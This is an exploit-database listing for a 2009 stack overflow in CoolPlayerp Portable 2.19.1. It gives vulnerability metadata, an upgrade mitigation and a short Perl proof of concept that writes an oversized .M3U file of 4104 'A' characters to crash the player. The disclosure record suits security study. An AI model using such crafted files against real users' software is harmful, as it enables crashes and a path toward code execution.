header-logo
Suggest Exploit
vendor:
CoolPlayerp Portable
by:
milw0rm.com
9,3
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: CoolPlayerp Portable
Affected Version From: 2.19.1
Affected Version To: 2.19.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:coolplayerp_project:coolplayerp_portable
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC

CoolPlayerp Portable 2.19.1 is vulnerable to a local stack overflow vulnerability when a specially crafted .M3U file is opened. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .M3U file.

Mitigation:

Upgrade to the latest version of CoolPlayerp Portable.
Source

Exploit-DB raw data:

# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ##  ##
# #  CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ## 
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";

# milw0rm.com [2009-04-20]